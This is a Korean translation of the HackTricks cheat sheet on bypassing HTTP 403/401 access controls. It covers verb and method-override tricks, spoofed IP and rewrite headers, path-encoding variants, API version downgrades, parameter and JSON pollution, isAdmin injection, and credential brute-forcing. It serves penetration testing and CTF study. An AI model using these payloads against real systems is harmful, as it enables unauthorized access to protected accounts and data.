403 & 401 Bypasses
Last updated
Last updated
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
웹 앱, 네트워크 및 클라우드에 대한 해커의 관점을 얻으세요
실제 비즈니스에 영향을 미치는 중요한 취약점을 찾아보고 보고하세요. 공격 표면을 매핑하고 권한 상승을 허용하는 보안 문제를 찾아내며, 자동화된 익스플로잇을 사용하여 필수 증거를 수집하여 귀하의 노력을 설득력 있는 보고서로 전환하는 20개 이상의 맞춤형 도구를 사용하세요.
파일에 접근하기 위해 다양한 동사를 사용해 보세요: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
응답 헤더를 확인하세요. 아마도 일부 정보가 제공될 수 있습니다. 예를 들어, HEAD에 대한 200 응답과 Content-Length: 55
는 HEAD 동사가 정보를 접근할 수 있음을 의미합니다. 그러나 여전히 그 정보를 유출할 방법을 찾아야 합니다.
X-HTTP-Method-Override: PUT
과 같은 HTTP 헤더를 사용하면 사용된 동사를 덮어쓸 수 있습니다.
TRACE
동사를 사용하고, 운이 좋다면 응답에서 유용할 수 있는 중간 프록시가 추가한 헤더를 볼 수 있습니다.
Host 헤더를 임의의 값으로 변경하세요 (여기서 작동한 것)
다른 사용자 에이전트 사용해 보기로 리소스에 접근해 보세요.
HTTP 헤더 퍼징: HTTP 프록시 헤더, HTTP 인증 기본 및 NTLM 브루트포스(몇 가지 조합만 사용) 및 기타 기술을 사용해 보세요. 이를 위해 fuzzhttpbypass 도구를 만들었습니다.
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost
경로가 보호되어 있는 경우 이러한 다른 헤더를 사용하여 경로 보호를 우회해 보세요:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
페이지가 프록시 뒤에 있는 경우, 아마도 프록시가 개인 정보에 접근하는 것을 방지하고 있을 수 있습니다. HTTP 요청 스머글링 또는 hop-by-hop 헤더를 악용해 보세요.
특수 HTTP 헤더를 퍼징하여 다양한 응답을 찾아보세요.
HTTP 메서드를 퍼징하는 동안 특수 HTTP 헤더를 퍼징하세요.
Host 헤더를 제거하면 보호를 우회할 수 있을지도 모릅니다.
만약 _/path_가 차단되어 있다면:
/%2e/path 사용해 보세요 _(접근이 프록시로 차단된 경우, 이 방법으로 보호를 우회할 수 있습니다). 또한_** /%252e**/path (이중 URL 인코딩)도 시도해 보세요.
유니코드 우회 시도: /%ef%bc%8fpath (URL 인코딩된 문자는 "/"와 같으므로 다시 인코딩하면 _//path_가 되어 /path 이름 검사를 이미 우회했을 수 있습니다.)
기타 경로 우회:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (루비)
다음 상황에서 이 목록를 사용하세요:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
기타 API 우회:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthorized
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthorized
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON 매개변수 오염)
user_id=ATTACKER_ID&user_id=VICTIM_ID (매개변수 오염)
매개변수 값 변경: id=123
--> id=124
URL에 추가 매개변수 추가: ?
id=124
—-> id=124&isAdmin=true
매개변수 제거
매개변수 순서 변경
특수 문자 사용.
매개변수에서 경계 테스트 수행 — -234 또는 0 또는 _99999999_와 같은 값을 제공하세요 (몇 가지 예시 값).
HTTP/1.1을 사용하는 경우 1.0을 사용해 보세요 또는 2.0을 지원하는지 테스트해 보세요.
도메인의 IP 또는 CNAME를 가져와서 직접 연락해 보세요.
일반 GET 요청을 보내 서버를 스트레스 테스트해 보세요 (이 사람은 Facebook에서 작동했습니다).
프로토콜 변경: http에서 https로, 또는 https에서 http로 변경해 보세요.
https://archive.org/web/로 가서 과거에 해당 파일이 전 세계적으로 접근 가능했는지 확인해 보세요.
비밀번호 추측: 다음 일반 자격 증명을 테스트해 보세요. 피해자에 대해 아는 것이 있나요? 또는 CTF 도전 이름은 무엇인가요?
브루트 포스: 기본, 다이제스트 및 NTLM 인증을 시도해 보세요.
웹 앱, 네트워크 및 클라우드에 대한 해커의 관점을 얻으세요.
실제 비즈니스에 영향을 미치는 중요한 취약점을 찾아보고 보고하세요. 공격 표면을 매핑하고 권한 상승을 허용하는 보안 문제를 찾아내며, 자동화된 익스플로잇을 사용하여 필수 증거를 수집하여 귀하의 노력을 설득력 있는 보고서로 전환하는 20개 이상의 맞춤형 도구를 사용하세요.
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)